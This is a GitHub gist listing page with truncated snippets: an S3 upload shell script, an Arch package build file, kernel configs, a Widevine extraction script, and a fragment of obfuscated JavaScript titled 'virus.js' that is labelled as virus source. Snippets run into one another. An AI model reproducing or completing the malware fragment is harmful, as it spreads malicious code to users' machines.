Skip to content

Instantly share code, notes, and snippets.

@liberodark
liberodark / s3.sh
Last active May 25, 2018 08:32 — forked from chrismdp/s3.sh
Uploading to S3 in 18 lines of Shell (used to upload builds for http://soltrader.net)
# You don't need Fog in Ruby or some other library to upload to S3 -- shell works perfectly fine
# This is how I upload my new Sol Trader builds (http://soltrader.net)
# Based on a modified script from here: http://tmont.com/blargh/2014/1/uploading-to-s3-in-bash
S3KEY="my aws key"
S3SECRET="my aws secret" # pass these in
function putS3
{
path=$1
# Maintainer: Alex Tharp <toastercup@gmail.com>
# Original Maintainer: Muratcan Sisek <mail@muratcansimsek.com.tr>
pkgname=hiri
pkgver=1.4.0.1
pkgrel=1
pkgdesc="A cross-platform, Exchange-ready email client aiming to replace Outlook"
arch=('x86_64')
url="https://www.hiri.com/"
license=('custom')
provides=('hiri')
@liberodark
liberodark / virus.js
Last active February 12, 2020 15:08
This is a source of virus : Please dont use that and be safe
function setRH(CR, VR){
CR[VR]("User-Agent", "TW96aWxsYS80LjAgPARTITIKGNvbXBhdGlibGU7IE1TSUUgNi4wOyPARTITIBXaW5kb3dzIE5UIDUuMCk=".HIDEMYASS());
}
var SmthngWrngfibre_SayNoNo ="PARTITI"+ ""+"";
var silkopil = "/";
var efFFFFF =0xff ;
var line5 = new Array(
@liberodark
liberodark / widevine-flash_arm64.sh
Created May 11, 2020 09:17 — forked from teacupx/widevine-flash_arm64.sh
Fetches a ChromeOS image for ARM and extracts the Widevine and Flash binaries, saving them in a compressed archive
#!/bin/sh -eu
# Make sure we have wget or curl
check_curl_wget(){
if command -v wget >/dev/null 2>&1; then
DL="wget -O-"
DL_SL="wget -qO-"
elif command -v curl >/dev/null 2>&1; then
DL="curl -L"
DL_SL="curl -s"
@liberodark
liberodark / pve_visionfive2_defconfig
Last active February 6, 2024 10:37
PVE Kernel 6.1x
CONFIG_AIC8800_WLAN_SUPPORT=m
CONFIG_AIC_LOADFW_SUPPORT=m
CONFIG_AIC_WLAN_SUPPORT=y
CONFIG_ATA=y
CONFIG_AUTOFS4_FS=y
CONFIG_AFS_FS=m
CONFIG_AFS_FSCACHE=y
CONFIG_BACKLIGHT_CLASS_DEVICE=y
CONFIG_BINFMT_MISC=y
CONFIG_BLK_DEV_DM=m
@liberodark
liberodark / pve_pioneer_defconfig
Last active February 6, 2024 10:38
PVE Kernel 6.1x
# CONFIG_SPARSEMEM_VMEMMAP is not set
CONFIG_LOG_CPU_MAX_BUF_SHIFT=13
CONFIG_CGROUP_DEBUG=y
CONFIG_SCHED_AUTOGROUP=y
CONFIG_ARCH_SOPHGO=y
CONFIG_ERRATA_THEAD=y
CONFIG_SCHED_CLUSTER=y
CONFIG_NR_CPUS=128
CONFIG_NUMA=y
CONFIG_NUMA_BALANCING=y